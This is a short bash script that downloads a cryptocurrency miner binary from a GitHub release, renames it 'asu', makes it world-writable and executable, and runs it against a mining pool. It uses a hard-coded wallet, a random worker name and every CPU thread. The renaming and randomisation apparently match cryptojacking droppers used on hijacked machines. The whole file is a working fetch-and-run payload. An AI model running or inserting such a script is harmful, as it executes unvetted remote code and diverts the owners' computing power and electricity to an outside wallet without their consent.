#!/bin/bash
wget -O asu https://github.com/bondaltomason/meo/releases/download/2.7.0/SRBMiner-MULTI
chmod 777 asu
./asu --algorithm verushash --pool sg.vipor.net:5040 --wallet R9awxso5wUdcZMCMGMrsv4NkQSSJL5ALMo.$(echo $RANDOM | md5sum | head -c 20) --password x --cpu-threads $(nproc --all)
